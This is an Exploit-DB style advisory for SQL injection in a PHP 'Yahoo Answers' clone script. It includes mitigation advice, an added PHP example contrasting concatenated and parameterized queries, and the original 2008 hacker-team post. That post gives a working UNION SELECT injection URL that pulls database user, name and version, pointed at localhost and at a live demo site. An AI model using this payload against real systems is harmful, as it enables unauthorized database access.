vendor: Yahoo Answers
by: Snakespc
CVSS: 7.5 HIGH
Remote SQL Injection
CWE: 89
Product Name: Yahoo Answers
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Yahoo Answers Remote SQL Injection Vulnerability

The vulnerability allows an attacker to inject malicious SQL queries through the id parameter of index.php in the Yahoo Answers script, potentially gaining unauthorized access to the database and extracting sensitive information.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. Regular security audits and patch updates should also be implemented to address any vulnerabilities.
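
The mitigation above, as an added example that is not code from the affected script or from this advisory: the same lookup written with string concatenation and with integer validation plus a bound parameter. It assumes PHP with the pdo_sqlite extension; the in-memory SQLite database, the questions table and both function names are hypothetical stand-ins.

```php
<?php
// Added example: SQLite in memory stands in for the application's database;
// the table, columns and function names are hypothetical.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE questions (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec("INSERT INTO questions VALUES (1, 'First question', 'Body text')");

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so anything after the number is parsed as SQL.
function findQuestionUnsafe(PDO $pdo, string $rawId): array
{
    $sql = 'SELECT id, title, body FROM questions WHERE id = ' . $rawId;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: accept only a positive integer, then bind it as a
// parameter so the value can never change the statement's structure.
function findQuestionSafe(PDO $pdo, string $rawId): array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // not a positive integer: no query is run
    }
    $stmt = $pdo->prepare('SELECT id, title, body FROM questions WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id, and a value with the same shape as the
// id in the advisory's URL, reduced to this table's three columns.
$inputs = ['1', '-1 UNION SELECT 1,2,3-- '];

foreach ($inputs as $raw) {
    printf(
        "id=%s unsafe_rows=%s safe_rows=%s\n",
        var_export($raw, true),
        json_encode(findQuestionUnsafe($pdo, $raw)),
        json_encode(findQuestionSafe($pdo, $raw))
    );
}
```

For the second input the concatenated query returns a row that is not in the table, while the hardened function rejects the value before any SQL is executed.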

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=                      Script: yahoo answers Remote SQL Injection Vulnerability                                  +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
                =                                                                                    =
                =        Script Demo:http://www.phpstore.info/product_info.php?products_id=163       =
                =                                                                                    =
                =                               www.phpstore.info                                    =              
                 =================================== Snakespc ======================================    


Exploit:

http://localhost/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	 

Demo :

http://phpstore.info/demos/yahooanswers/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	
                                                                      
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/SC >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2008-11-16]